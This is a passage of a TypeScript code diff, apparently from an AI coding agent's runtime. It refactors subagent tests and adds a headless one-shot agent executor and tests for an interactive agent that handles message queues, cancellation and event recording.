+809,10 @@ describe('subagent.ts', () => { runConfig, ); - await scope.runNonInteractive(new ContextState()); + await scope.execute(new ContextState()); expect(mockSendMessageStream).toHaveBeenCalledTimes(2); - expect(scope.getTerminateMode()).toBe(SubagentTerminateMode.MAX_TURNS); + expect(scope.getTerminateMode()).toBe(AgentTerminateMode.MAX_TURNS); }); it.skip('should terminate with TIMEOUT if the time limit is reached during an LLM call', async () => { @@ -835,7 +836,7 @@ describe('subagent.ts', () => { // The LLM call will hang until we resolve the promise. 
mockSendMessageStream.mockReturnValue(streamPromise); - const scope = await SubAgentScope.create( + const scope = await AgentHeadless.create( 'test-agent', config, promptConfig, @@ -843,7 +844,7 @@ describe('subagent.ts', () => { runConfig, ); - const runPromise = scope.runNonInteractive(new ContextState()); + const runPromise = scope.execute(new ContextState()); // Advance time beyond the limit (6 minutes) while the agent is awaiting the LLM response. await vi.advanceTimersByTimeAsync(6 * 60 * 1000); @@ -854,7 +855,7 @@ describe('subagent.ts', () => { await runPromise; - expect(scope.getTerminateMode()).toBe(SubagentTerminateMode.TIMEOUT); + expect(scope.getTerminateMode()).toBe(AgentTerminateMode.TIMEOUT); expect(mockSendMessageStream).toHaveBeenCalledTimes(1); vi.useRealTimers(); @@ -864,7 +865,7 @@ describe('subagent.ts', () => { const { config } = await createMockConfig(); mockSendMessageStream.mockRejectedValue(new Error('API Failure')); - const scope = await SubAgentScope.create( + const scope = await AgentHeadless.create( 'test-agent', config, promptConfig, @@ -872,14 +873,14 @@ describe('subagent.ts', () => { defaultRunConfig, ); - await expect( - scope.runNonInteractive(new ContextState()), - ).rejects.toThrow('API Failure'); - expect(scope.getTerminateMode()).toBe(SubagentTerminateMode.ERROR); + await expect(scope.execute(new ContextState())).rejects.toThrow( + 'API Failure', + ); + expect(scope.getTerminateMode()).toBe(AgentTerminateMode.ERROR); }); }); - describe('runNonInteractive - Streaming and Thought Handling', () => { + describe('execute - Streaming and Thought Handling', () => { const promptConfig: PromptConfig = { systemPrompt: 'Execute task.' 
}; // Helper to create a mock stream that yields specific parts @@ -913,13 +914,13 @@ describe('subagent.ts', () => { }) as unknown as GeminiChat, ); - const eventEmitter = new SubAgentEventEmitter(); - const events: SubAgentStreamTextEvent[] = []; - eventEmitter.on(SubAgentEventType.STREAM_TEXT, (...args: unknown[]) => { - events.push(args[0] as SubAgentStreamTextEvent); + const eventEmitter = new AgentEventEmitter(); + const events: AgentStreamTextEvent[] = []; + eventEmitter.on(AgentEventType.STREAM_TEXT, (...args: unknown[]) => { + events.push(args[0] as AgentStreamTextEvent); }); - const scope = await SubAgentScope.create( + const scope = await AgentHeadless.create( 'test-agent', config, promptConfig, @@ -929,7 +930,7 @@ describe('subagent.ts', () => { eventEmitter, ); - await scope.runNonInteractive(new ContextState()); + await scope.execute(new ContextState()); expect(events).toHaveLength(2); expect(events[0]!.text).toBe('Let me think...'); @@ -952,7 +953,7 @@ describe('subagent.ts', () => { }) as unknown as GeminiChat, ); - const scope = await SubAgentScope.create( + const scope = await AgentHeadless.create( 'test-agent', config, promptConfig, @@ -960,9 +961,9 @@ describe('subagent.ts', () => { defaultRunConfig, ); - await scope.runNonInteractive(new ContextState()); + await scope.execute(new ContextState()); - expect(scope.getTerminateMode()).toBe(SubagentTerminateMode.GOAL); + expect(scope.getTerminateMode()).toBe(AgentTerminateMode.GOAL); expect(scope.getFinalText()).toBe('The final answer.'); }); @@ -1016,7 +1017,7 @@ describe('subagent.ts', () => { }) as unknown as GeminiChat, ); - const scope = await SubAgentScope.create( + const scope = await AgentHeadless.create( 'test-agent', config, promptConfig, @@ -1024,16 +1025,16 @@ describe('subagent.ts', () => { defaultRunConfig, ); - await scope.runNonInteractive(new ContextState()); + await scope.execute(new ContextState()); - expect(scope.getTerminateMode()).toBe(SubagentTerminateMode.GOAL); + 
expect(scope.getTerminateMode()).toBe(AgentTerminateMode.GOAL); expect(scope.getFinalText()).toBe('Actual output.'); // Should have been called twice: first with thought-only, then nudged expect(mockSendMessageStream).toHaveBeenCalledTimes(2); }); }); - describe('runNonInteractive - Tool Restriction Enforcement (Issue #1121)', () => { + describe('execute - Tool Restriction Enforcement (Issue #1121)', () => { const promptConfig: PromptConfig = { systemPrompt: 'Execute task.' }; it('should NOT execute tools that are not in the allowed tools list', async () => { @@ -1056,7 +1057,7 @@ describe('subagent.ts', () => { params: { path: 'test.txt' }, getDescription: vi.fn().mockReturnValue('Read file'), toolLocations: vi.fn().mockReturnValue([]), - shouldConfirmExecute: vi.fn().mockResolvedValue(false), + getDefaultPermission: vi.fn().mockResolvedValue('allow'), execute: vi.fn().mockImplementation(async () => { executedTools.push('read_file'); return { @@ -1070,7 +1071,7 @@ describe('subagent.ts', () => { params: { path: 'test.txt', content: 'malicious content' }, getDescription: vi.fn().mockReturnValue('Edit file'), toolLocations: vi.fn().mockReturnValue([]), - shouldConfirmExecute: vi.fn().mockResolvedValue(false), + getDefaultPermission: vi.fn().mockResolvedValue('allow'), execute: vi.fn().mockImplementation(async () => { executedTools.push('edit_file'); return { @@ -1142,19 +1143,19 @@ describe('subagent.ts', () => { ); // Track emitted events - const toolCallEvents: SubAgentToolCallEvent[] = []; - const toolResultEvents: SubAgentToolResultEvent[] = []; + const toolCallEvents: AgentToolCallEvent[] = []; + const toolResultEvents: AgentToolResultEvent[] = []; // Create event emitter BEFORE the scope and subscribe to events - const eventEmitter = new SubAgentEventEmitter(); - eventEmitter.on(SubAgentEventType.TOOL_CALL, (event: unknown) => { - toolCallEvents.push(event as SubAgentToolCallEvent); + const eventEmitter = new AgentEventEmitter(); + 
eventEmitter.on(AgentEventType.TOOL_CALL, (event: unknown) => { + toolCallEvents.push(event as AgentToolCallEvent); }); - eventEmitter.on(SubAgentEventType.TOOL_RESULT, (event: unknown) => { - toolResultEvents.push(event as SubAgentToolResultEvent); + eventEmitter.on(AgentEventType.TOOL_RESULT, (event: unknown) => { + toolResultEvents.push(event as AgentToolResultEvent); }); - const scope = await SubAgentScope.create( + const scope = await AgentHeadless.create( 'test-agent', config, promptConfig, @@ -1164,7 +1165,7 @@ describe('subagent.ts', () => { eventEmitter, ); - await scope.runNonInteractive(new ContextState()); + await scope.execute(new ContextState()); // 1. Only allowed tool should be executed expect(executedTools).toContain('read_file'); diff --git a/packages/core/src/agents/runtime/agent-headless.ts b/packages/core/src/agents/runtime/agent-headless.ts new file mode 100644 index 000000000..ac02f80df --- /dev/null +++ b/packages/core/src/agents/runtime/agent-headless.ts @@ -0,0 +1,360 @@ +/** + * @license + * Copyright 2025 Qwen + * SPDX-License-Identifier: Apache-2.0 + */ + +/** + * @fileoverview AgentHeadless — one-shot task execution wrapper around AgentCore. + * + * AgentHeadless manages + * the lifecycle of a single headless task: start → run → finish. + * It delegates all model reasoning and tool scheduling to AgentCore. + * + * For persistent interactive agents, see AgentInteractive (Phase 2). 
+ */ + +import type { Config } from '../../config/config.js'; +import { createDebugLogger } from '../../utils/debugLogger.js'; +import type { + AgentEventEmitter, + AgentStartEvent, + AgentErrorEvent, + AgentFinishEvent, + AgentHooks, +} from './agent-events.js'; +import { AgentEventType } from './agent-events.js'; +import type { AgentStatsSummary } from './agent-statistics.js'; +import type { + PromptConfig, + ModelConfig, + RunConfig, + ToolConfig, +} from './agent-types.js'; +import { AgentTerminateMode } from './agent-types.js'; +import { logSubagentExecution } from '../../telemetry/loggers.js'; +import { SubagentExecutionEvent } from '../../telemetry/types.js'; +import { AgentCore } from './agent-core.js'; +import { DEFAULT_QWEN_MODEL } from '../../config/models.js'; + +const debugLogger = createDebugLogger('SUBAGENT'); + +// ─── Utilities (unchanged, re-exported for consumers) ──────── + +/** + * Manages the runtime context state for the subagent. + * This class provides a mechanism to store and retrieve key-value pairs + * that represent the dynamic state and variables accessible to the subagent + * during its execution. + */ +export class ContextState { + private state: Record = {}; + + /** + * Retrieves a value from the context state. + * + * @param key - The key of the value to retrieve. + * @returns The value associated with the key, or undefined if the key is not found. + */ + get(key: string): unknown { + return this.state[key]; + } + + /** + * Sets a value in the context state. + * + * @param key - The key to set the value under. + * @param value - The value to set. + */ + set(key: string, value: unknown): void { + this.state[key] = value; + } + + /** + * Retrieves all keys in the context state. + * + * @returns An array of all keys in the context state. + */ + get_keys(): string[] { + return Object.keys(this.state); + } +} + +/** + * Replaces `${...}` placeholders in a template string with values from a context. 
+ * + * This function identifies all placeholders in the format `${key}`, validates that + * each key exists in the provided `ContextState`, and then performs the substitution. + * + * @param template The template string containing placeholders. + * @param context The `ContextState` object providing placeholder values. + * @returns The populated string with all placeholders replaced. + * @throws {Error} if any placeholder key is not found in the context. + */ +export function templateString( + template: string, + context: ContextState, +): string { + const placeholderRegex = /\$\{(\w+)\}/g; + + // First, find all unique keys required by the template. + const requiredKeys = new Set( + Array.from(template.matchAll(placeholderRegex), (match) => match[1]), + ); + + // Check if all required keys exist in the context. + const contextKeys = new Set(context.get_keys()); + const missingKeys = Array.from(requiredKeys).filter( + (key) => !contextKeys.has(key), + ); + + if (missingKeys.length > 0) { + throw new Error( + `Missing context values for the following keys: ${missingKeys.join( + ', ', + )}`, + ); + } + + // Perform the replacement using a replacer function. + return template.replace(placeholderRegex, (_match, key) => + String(context.get(key)), + ); +} + +// ─── AgentHeadless ────────────────────────────────────────── + +/** + * AgentHeadless — one-shot task executor. + * + * Takes a task, runs it through AgentCore's reasoning loop, and returns + * the result. + * + * Lifecycle: Born → execute() → die. + */ +export class AgentHeadless { + private readonly core: AgentCore; + private finalText: string = ''; + private terminateMode: AgentTerminateMode = AgentTerminateMode.ERROR; + + private constructor(core: AgentCore) { + this.core = core; + } + + /** + * Creates a new AgentHeadless instance. + * + * @param name - The name for the subagent, used for logging and identification. + * @param runtimeContext - The shared runtime configuration and services. 
+ * @param promptConfig - Configuration for the subagent's prompt and behavior. + * @param modelConfig - Configuration for the generative model parameters. + * @param runConfig - Configuration for the subagent's execution environment. + * @param toolConfig - Optional configuration for tools available to the subagent. + * @param eventEmitter - Optional event emitter for streaming events to UI. + * @param hooks - Optional lifecycle hooks. + */ + static async create( + name: string, + runtimeContext: Config, + promptConfig: PromptConfig, + modelConfig: ModelConfig, + runConfig: RunConfig, + toolConfig?: ToolConfig, + eventEmitter?: AgentEventEmitter, + hooks?: AgentHooks, + ): Promise { + const core = new AgentCore( + name, + runtimeContext, + promptConfig, + modelConfig, + runConfig, + toolConfig, + eventEmitter, + hooks, + ); + return new AgentHeadless(core); + } + + /** + * Executes the task in headless mode. + * + * This method orchestrates the subagent's execution lifecycle: + * 1. Creates a chat session + * 2. Prepares tools + * 3. Runs the reasoning loop until completion/termination + * 4. Emits start/finish/error events + * 5. Records telemetry + * + * @param context - The current context state containing variables for prompt templating. + * @param externalSignal - Optional abort signal for external cancellation. 
+ */ + async execute( + context: ContextState, + externalSignal?: AbortSignal, + ): Promise { + const chat = await this.core.createChat(context); + + if (!chat) { + this.terminateMode = AgentTerminateMode.ERROR; + return; + } + + // Set up abort signal propagation + const abortController = new AbortController(); + const onExternalAbort = () => { + abortController.abort(); + }; + if (externalSignal) { + externalSignal.addEventListener('abort', onExternalAbort); + } + if (externalSignal?.aborted) { + abortController.abort(); + } + + const toolsList = this.core.prepareTools(); + + const initialTaskText = String( + (context.get('task_prompt') as string) ?? 'Get Started!', + ); + const initialMessages = [ + { role: 'user' as const, parts: [{ text: initialTaskText }] }, + ]; + + const startTime = Date.now(); + this.core.executionStats.startTimeMs = startTime; + this.core.stats.start(startTime); + + try { + // Emit start event + this.core.eventEmitter?.emit(AgentEventType.START, { + subagentId: this.core.subagentId, + name: this.core.name, + model: + this.core.modelConfig.model || + this.core.runtimeContext.getModel() || + DEFAULT_QWEN_MODEL, + tools: (this.core.toolConfig?.tools || ['*']).map((t) => + typeof t === 'string' ? t : t.name, + ), + timestamp: Date.now(), + } as AgentStartEvent); + + // Log telemetry for subagent start + const startEvent = new SubagentExecutionEvent(this.core.name, 'started'); + logSubagentExecution(this.core.runtimeContext, startEvent); + + // Delegate to AgentCore's reasoning loop + const result = await this.core.runReasoningLoop( + chat, + initialMessages, + toolsList, + abortController, + { + maxTurns: this.core.runConfig.max_turns, + maxTimeMinutes: this.core.runConfig.max_time_minutes, + startTimeMs: startTime, + }, + ); + + this.finalText = result.text; + this.terminateMode = result.terminateMode ?? 
AgentTerminateMode.GOAL; + } catch (error) { + debugLogger.error('Error during subagent execution:', error); + this.terminateMode = AgentTerminateMode.ERROR; + this.core.eventEmitter?.emit(AgentEventType.ERROR, { + subagentId: this.core.subagentId, + error: error instanceof Error ? error.message : String(error), + timestamp: Date.now(), + } as AgentErrorEvent); + + throw error; + } finally { + if (externalSignal) { + externalSignal.removeEventListener('abort', onExternalAbort); + } + this.core.executionStats.totalDurationMs = Date.now() - startTime; + const summary = this.core.stats.getSummary(Date.now()); + this.core.eventEmitter?.emit(AgentEventType.FINISH, { + subagentId: this.core.subagentId, + terminateReason: this.terminateMode, + timestamp: Date.now(), + rounds: summary.rounds, + totalDurationMs: summary.totalDurationMs, + totalToolCalls: summary.totalToolCalls, + successfulToolCalls: summary.successfulToolCalls, + failedToolCalls: summary.failedToolCalls, + inputTokens: summary.inputTokens, + outputTokens: summary.outputTokens, + totalTokens: summary.totalTokens, + } as AgentFinishEvent); + + const completionEvent = new SubagentExecutionEvent( + this.core.name, + this.terminateMode === AgentTerminateMode.GOAL ? 'completed' : 'failed', + { + terminate_reason: this.terminateMode, + result: this.finalText, + execution_summary: this.core.stats.formatCompact( + 'Subagent execution completed', + ), + }, + ); + logSubagentExecution(this.core.runtimeContext, completionEvent); + + await this.core.hooks?.onStop?.({ + subagentId: this.core.subagentId, + name: this.core.name, + terminateReason: this.terminateMode, + summary: summary as unknown as Record, + timestamp: Date.now(), + }); + } + } + + // ─── Accessors ───────────────────────────────────────────── + + /** + * Provides access to the underlying AgentCore for advanced use cases. + * Used by AgentInteractive and InProcessBackend. 
+ */ + getCore(): AgentCore { + return this.core; + } + + get executionStats() { + return this.core.executionStats; + } + + set executionStats(value) { + this.core.executionStats = value; + } + + getEventEmitter() { + return this.core.getEventEmitter(); + } + + getStatistics() { + return this.core.getStatistics(); + } + + getExecutionSummary(): AgentStatsSummary { + return this.core.getExecutionSummary(); + } + + getFinalText(): string { + return this.finalText; + } + + getTerminateMode(): AgentTerminateMode { + return this.terminateMode; + } + + get name(): string { + return this.core.name; + } + + get runtimeContext(): Config { + return this.core.runtimeContext; + } +} diff --git a/packages/core/src/agents/runtime/agent-interactive.test.ts b/packages/core/src/agents/runtime/agent-interactive.test.ts new file mode 100644 index 000000000..5560b665f --- /dev/null +++ b/packages/core/src/agents/runtime/agent-interactive.test.ts @@ -0,0 +1,620 @@ +/** + * @license + * Copyright 2025 Qwen + * SPDX-License-Identifier: Apache-2.0 + */ + +import { describe, it, expect, vi, beforeEach } from 'vitest'; +import { AgentInteractive } from './agent-interactive.js'; +import type { AgentCore } from './agent-core.js'; +import { AgentEventEmitter, AgentEventType } from './agent-events.js'; +import { ContextState } from './agent-headless.js'; +import type { AgentInteractiveConfig } from './agent-types.js'; +import { AgentStatus } from './agent-types.js'; + +function createMockChat() { + return { + sendMessageStream: vi.fn(), + }; +} + +function createMockCore( + overrides: { + chatValue?: unknown; + nullChat?: boolean; + loopResult?: { text: string; terminateMode: null; turnsUsed: number }; + } = {}, +) { + const emitter = new AgentEventEmitter(); + const chatReturnValue = overrides.nullChat + ? undefined + : overrides.chatValue !== undefined + ? 
overrides.chatValue + : createMockChat(); + const core = { + subagentId: 'test-agent-abc123', + name: 'test-agent', + eventEmitter: emitter, + stats: { + start: vi.fn(), + getSummary: vi.fn().mockReturnValue({ + rounds: 1, + totalDurationMs: 100, + totalToolCalls: 0, + successfulToolCalls: 0, + failedToolCalls: 0, + inputTokens: 0, + outputTokens: 0, + totalTokens: 0, + }), + setRounds: vi.fn(), + recordToolCall: vi.fn(), + recordTokens: vi.fn(), + }, + createChat: vi.fn().mockResolvedValue(chatReturnValue), + prepareTools: vi.fn().mockReturnValue([]), + runReasoningLoop: vi.fn().mockResolvedValue( + overrides.loopResult ?? { + text: 'Done', + terminateMode: null, + turnsUsed: 1, + }, + ), + getEventEmitter: () => emitter, + getExecutionSummary: vi.fn().mockReturnValue({ + rounds: 1, + totalDurationMs: 100, + totalToolCalls: 0, + successfulToolCalls: 0, + failedToolCalls: 0, + inputTokens: 0, + outputTokens: 0, + totalTokens: 0, + }), + } as unknown as AgentCore; + + return { core, emitter }; +} + +function createConfig( + overrides: Partial = {}, +): AgentInteractiveConfig { + return { + agentId: 'agent-1', + agentName: 'Test Agent', + ...overrides, + }; +} + +describe('AgentInteractive', () => { + let context: ContextState; + + beforeEach(() => { + context = new ContextState(); + }); + + // ─── Lifecycle ────────────────────────────────────────────── + + it('should initialize and complete cleanly without initialTask', async () => { + const { core } = createMockCore(); + const config = createConfig(); + const agent = new AgentInteractive(config, core); + + await agent.start(context); + // No initialTask → agent is waiting on queue, status is still initializing. + // Shutdown drains queue, loop exits normally → completed. 
+ await agent.shutdown(); + expect(agent.getStatus()).toBe('completed'); + }); + + it('should process initialTask immediately on start', async () => { + const { core } = createMockCore(); + const config = createConfig({ initialTask: 'Do something' }); + const agent = new AgentInteractive(config, core); + + await agent.start(context); + await vi.waitFor(() => { + expect(agent.getStatus()).toBe('idle'); + }); + + expect(core.runReasoningLoop).toHaveBeenCalledOnce(); + expect(agent.getMessages().length).toBeGreaterThan(0); + expect(agent.getMessages()[0]?.role).toBe('user'); + expect(agent.getMessages()[0]?.content).toBe('Do something'); + + await agent.shutdown(); + expect(agent.getStatus()).toBe('completed'); + }); + + it('should process enqueued messages', async () => { + const { core } = createMockCore(); + const config = createConfig(); + const agent = new AgentInteractive(config, core); + + await agent.start(context); + + agent.enqueueMessage('Hello'); + await vi.waitFor(() => { + expect(agent.getStatus()).toBe('idle'); + }); + + expect(core.runReasoningLoop).toHaveBeenCalledOnce(); + + await agent.shutdown(); + }); + + it('should set status to failed when chat creation fails', async () => { + const { core } = createMockCore({ nullChat: true }); + const config = createConfig(); + const agent = new AgentInteractive(config, core); + + await agent.start(context); + + expect(agent.getStatus()).toBe('failed'); + expect(agent.getError()).toBe('Failed to create chat session'); + }); + + // ─── Error Recovery ──────────────────────────────────────── + + it('should survive round errors and recover', async () => { + const { core } = createMockCore(); + + let callCount = 0; + (core.runReasoningLoop as ReturnType).mockImplementation( + () => { + callCount++; + if (callCount === 1) { + return Promise.reject(new Error('Model error')); + } + return Promise.resolve({ + text: 'Recovered', + terminateMode: null, + turnsUsed: 1, + }); + }, + ); + + const config = createConfig(); + 
const agent = new AgentInteractive(config, core); + + await agent.start(context); + + agent.enqueueMessage('cause error'); + await vi.waitFor(() => { + expect(agent.getStatus()).toBe('failed'); + expect(callCount).toBe(1); + }); + + // Error recorded as info message with error level + const messages = agent.getMessages(); + const errorMsg = messages.find( + (m) => + m.role === 'info' && + m.content.includes('Model error') && + m.metadata?.['level'] === 'error', + ); + expect(errorMsg).toBeDefined(); + + // Second message works fine + agent.enqueueMessage('recover'); + await vi.waitFor(() => { + expect(agent.getStatus()).toBe('idle'); + expect(callCount).toBe(2); + }); + + await agent.shutdown(); + }); + + // ─── Cancellation ────────────────────────────────────────── + + it('should cancel current round without killing the agent', async () => { + const { core } = createMockCore(); + let resolveLoop: () => void; + (core.runReasoningLoop as ReturnType).mockImplementation( + () => + new Promise<{ text: string; terminateMode: string; turnsUsed: number }>( + (resolve) => { + resolveLoop = () => + resolve({ text: '', terminateMode: 'cancelled', turnsUsed: 0 }); + }, + ), + ); + + const config = createConfig(); + const agent = new AgentInteractive(config, core); + + await agent.start(context); + + agent.enqueueMessage('long task'); + await vi.waitFor(() => { + expect(agent.getStatus()).toBe('running'); + }); + + agent.cancelCurrentRound(); + resolveLoop!(); + + await vi.waitFor(() => { + expect(agent.getStatus()).toBe('idle'); + }); + + await agent.shutdown(); + }); + + it('should abort immediately', async () => { + const { core } = createMockCore(); + (core.runReasoningLoop as ReturnType).mockImplementation( + () => + new Promise((resolve) => { + setTimeout( + () => + resolve({ + text: '', + terminateMode: 'cancelled', + turnsUsed: 0, + }), + 50, + ); + }), + ); + + const config = createConfig({ initialTask: 'long task' }); + const agent = new AgentInteractive(config, 
core); + + await agent.start(context); + agent.abort(); + + await agent.waitForCompletion(); + expect(agent.getStatus()).toBe('cancelled'); + }); + + // ─── Accessors ───────────────────────────────────────────── + + it('should provide stats via getStats()', async () => { + const { core } = createMockCore(); + const config = createConfig(); + const agent = new AgentInteractive(config, core); + + const stats = agent.getStats(); + expect(stats).toBeDefined(); + expect(stats.rounds).toBe(1); + }); + + it('should provide core via getCore()', () => { + const { core } = createMockCore(); + const config = createConfig(); + const agent = new AgentInteractive(config, core); + + expect(agent.getCore()).toBe(core); + }); + + // ─── Message Recording ───────────────────────────────────── + + it('should record assistant text from ROUND_TEXT events', async () => { + const { core, emitter } = createMockCore(); + + (core.runReasoningLoop as ReturnType).mockImplementation( + () => { + emitter.emit(AgentEventType.ROUND_TEXT, { + subagentId: 'test', + round: 1, + text: 'Hello from round', + thoughtText: '', + timestamp: Date.now(), + }); + return Promise.resolve({ + text: 'Hello from round', + terminateMode: null, + turnsUsed: 1, + }); + }, + ); + + const config = createConfig({ initialTask: 'test' }); + const agent = new AgentInteractive(config, core); + + await agent.start(context); + await vi.waitFor(() => { + expect(agent.getStatus()).toBe('idle'); + }); + + const assistantMsgs = agent + .getMessages() + .filter((m) => m.role === 'assistant' && !m.thought); + expect(assistantMsgs).toHaveLength(1); + expect(assistantMsgs[0]?.content).toBe('Hello from round'); + + await agent.shutdown(); + }); + + it('should not cross-contaminate text across messages', async () => { + const { core, emitter } = createMockCore(); + + let runCount = 0; + (core.runReasoningLoop as ReturnType).mockImplementation( + () => { + runCount++; + emitter.emit(AgentEventType.ROUND_TEXT, { + subagentId: 'test', + 
round: 1, + text: `response-${runCount}`, + thoughtText: '', + timestamp: Date.now(), + }); + return Promise.resolve({ + text: `response-${runCount}`, + terminateMode: null, + turnsUsed: 1, + }); + }, + ); + + const config = createConfig({ initialTask: 'first message' }); + const agent = new AgentInteractive(config, core); + + await agent.start(context); + await vi.waitFor(() => { + expect(agent.getStatus()).toBe('idle'); + }); + + agent.enqueueMessage('second message'); + await vi.waitFor(() => { + expect(agent.getStatus()).toBe('idle'); + expect(runCount).toBe(2); + }); + + const messages = agent.getMessages(); + const assistantMessages = messages.filter( + (m) => m.role === 'assistant' && !m.thought, + ); + const corrupted = assistantMessages.find( + (m) => + m.content.includes('response-1') && m.content.includes('response-2'), + ); + expect(corrupted).toBeUndefined(); + + await agent.shutdown(); + }); + + it('should capture thinking text as assistant messages with thought=true', async () => { + const { core, emitter } = createMockCore(); + + (core.runReasoningLoop as ReturnType).mockImplementation( + () => { + emitter.emit(AgentEventType.ROUND_TEXT, { + subagentId: 'test', + round: 1, + text: 'Here is the answer', + thoughtText: 'Let me think...', + timestamp: Date.now(), + }); + return Promise.resolve({ + text: 'Here is the answer', + terminateMode: null, + turnsUsed: 1, + }); + }, + ); + + const config = createConfig({ initialTask: 'think about this' }); + const agent = new AgentInteractive(config, core); + + await agent.start(context); + await vi.waitFor(() => { + expect(agent.getStatus()).toBe('idle'); + }); + + const messages = agent.getMessages(); + const thoughtMsg = messages.find( + (m) => m.role === 'assistant' && m.thought === true, + ); + const textMsg = messages.find((m) => m.role === 'assistant' && !m.thought); + + expect(thoughtMsg).toBeDefined(); + expect(thoughtMsg?.content).toBe('Let me think...'); + expect(textMsg).toBeDefined(); + 
expect(textMsg?.content).toBe('Here is the answer'); + + await agent.shutdown(); + }); + + it('should record tool_call and tool_result with correct roles', async () => { + const { core, emitter } = createMockCore(); + + (core.runReasoningLoop as ReturnType).mockImplementation( + () => { + emitter.emit(AgentEventType.ROUND_TEXT, { + subagentId: 'test', + round: 1, + text: 'I will read the file', + thoughtText: '', + timestamp: Date.now(), + }); + emitter.emit(AgentEventType.TOOL_CALL, { + subagentId: 'test', + round: 1, + callId: 'call-1', + name: 'read_file', + args: { path: 'test.ts' }, + description: 'Read test.ts', + timestamp: Date.now(), + }); + emitter.emit(AgentEventType.TOOL_RESULT, { + subagentId: 'test', + round: 1, + callId: 'call-1', + name: 'read_file', + success: true, + timestamp: Date.now(), + }); + return Promise.resolve({ + text: '', + terminateMode: null, + turnsUsed: 1, + }); + }, + ); + + const config = createConfig({ initialTask: 'read a file' }); + const agent = new AgentInteractive(config, core); + + await agent.start(context); + await vi.waitFor(() => { + expect(agent.getStatus()).toBe('idle'); + }); + + const messages = agent.getMessages(); + const toolCall = messages.find((m) => m.role === 'tool_call'); + const toolResult = messages.find((m) => m.role === 'tool_result'); + + expect(toolCall).toBeDefined(); + expect(toolCall?.metadata?.['toolName']).toBe('read_file'); + expect(toolCall?.metadata?.['callId']).toBe('call-1'); + + expect(toolResult).toBeDefined(); + expect(toolResult?.metadata?.['success']).toBe(true); + + await agent.shutdown(); + }); + + it('should place text before tool_call to preserve temporal ordering', async () => { + const { core, emitter } = createMockCore(); + + (core.runReasoningLoop as ReturnType).mockImplementation( + () => { + emitter.emit(AgentEventType.ROUND_TEXT, { + subagentId: 'test', + round: 1, + text: 'Let me check', + thoughtText: '', + timestamp: Date.now(), + }); + 
emitter.emit(AgentEventType.TOOL_CALL, { + subagentId: 'test', + round: 1, + callId: 'call-1', + name: 'read_file', + args: {}, + description: '', + timestamp: Date.now(), + }); + emitter.emit(AgentEventType.TOOL_RESULT, { + subagentId: 'test', + round: 1, + callId: 'call-1', + name: 'read_file', + success: true, + timestamp: Date.now(), + }); + return Promise.resolve({ + text: '', + terminateMode: null, + turnsUsed: 1, + }); + }, + ); + + const config = createConfig({ initialTask: 'task' }); + const agent = new AgentInteractive(config, core); + + await agent.start(context); + await vi.waitFor(() => { + expect(agent.getStatus()).toBe('idle'); + }); + + const messages = agent.getMessages(); + const nonUser = messages.filter((m) => m.role !== 'user'); + + const textIdx = nonUser.findIndex( + (m) => m.role === 'assistant' && m.content === 'Let me check', + ); + const toolIdx = nonUser.findIndex((m) => m.role === 'tool_call'); + expect(textIdx).toBeLessThan(toolIdx); + + await agent.shutdown(); + }); + + // ─── Chat History ──────────────────────────────────────────── + + it('should pass chatHistory as extraHistory to createChat', async () => { + const { core } = createMockCore(); + const chatHistory = [ + { role: 'user' as const, parts: [{ text: 'earlier question' }] }, + { role: 'model' as const, parts: [{ text: 'earlier answer' }] }, + ]; + const config = createConfig({ chatHistory }); + const agent = new AgentInteractive(config, core); + + await agent.start(context); + + expect(core.createChat).toHaveBeenCalledWith(context, { + interactive: true, + extraHistory: chatHistory, + }); + + await agent.shutdown(); + }); + + it('should add info message when chatHistory is present', async () => { + const { core } = createMockCore(); + const chatHistory = [ + { role: 'user' as const, parts: [{ text: 'earlier question' }] }, + { role: 'model' as const, parts: [{ text: 'earlier answer' }] }, + ]; + const agent = new AgentInteractive(createConfig({ chatHistory }), core); + + 
await agent.start(context); + + const messages = agent.getMessages(); + expect(messages).toHaveLength(1); + expect(messages[0]).toMatchObject({ + role: 'info', + content: 'History context from parent session included (2 messages)', + }); + + await agent.shutdown(); + }); + + it('should not add info message when chatHistory is absent', async () => { + const { core } = createMockCore(); + const agent = new AgentInteractive(createConfig(), core); + + await agent.start(context); + + expect(agent.getMessages()).toHaveLength(0); + + await agent.shutdown(); + }); + + it('should pass undefined extraHistory when chatHistory is not set', async () => { + const { core } = createMockCore(); + const config = createConfig(); + const agent = new AgentInteractive(config, core); + + await agent.start(context); + + expect(core.createChat).toHaveBeenCalledWith(context, { + interactive: true, + extraHistory: undefined, + }); + + await agent.shutdown(); + }); + + // ─── Events ──────────────────────────────────────────────── + + it('should emit status_change events', async () => { + const { core, emitter } = createMockCore(); + const config = createConfig(); + const agent = new AgentInteractive(config, core); + + const statuses: AgentStatus[] = []; + emitter.on(AgentEventType.STATUS_CHANGE, (payload) => { + statuses.push(payload.newStatus); + }); + + await agent.start(context); + await agent.shutdown(); + + expect(statuses).toContain(AgentStatus.COMPLETED); + }); +}); diff --git a/packages/core/src/agents/runtime/agent-interactive.ts b/packages/core/src/agents/runtime/agent-interactive.ts new file mode 100644 index 000000000..42e9dedce --- /dev/null +++ b/packages/core/src/agents/runtime/agent-interactive.ts @@ -0,0 +1,512 @@ +/** + * @license + * Copyright 2025 Qwen + * SPDX-License-Identifier: Apache-2.0 + */ + +/** + * @fileoverview AgentInteractive — persistent interactive agent. + * + * Composes AgentCore with on-demand message processing. 
Builds conversation + * state (messages, pending approvals, live outputs) that the UI reads. + */ + +import { createDebugLogger } from '../../utils/debugLogger.js'; +import { type AgentEventEmitter, AgentEventType } from './agent-events.js'; +import type { + AgentRoundTextEvent, + AgentToolCallEvent, + AgentToolResultEvent, + AgentToolOutputUpdateEvent, + AgentApprovalRequestEvent, +} from './agent-events.js'; +import type { AgentStatsSummary } from './agent-statistics.js'; +import type { AgentCore } from './agent-core.js'; +import type { ContextState } from './agent-headless.js'; +import type { GeminiChat } from '../../core/geminiChat.js'; +import type { FunctionDeclaration } from '@google/genai'; +import { + ToolConfirmationOutcome, + type ToolCallConfirmationDetails, + type ToolResultDisplay, +} from '../../tools/tools.js'; +import { AsyncMessageQueue } from '../../utils/asyncMessageQueue.js'; +import { + AgentTerminateMode, + AgentStatus, + isTerminalStatus, + type AgentInteractiveConfig, + type AgentMessage, +} from './agent-types.js'; + +const debugLogger = createDebugLogger('AGENT_INTERACTIVE'); + +/** + * AgentInteractive — persistent interactive agent that processes + * messages on demand. 
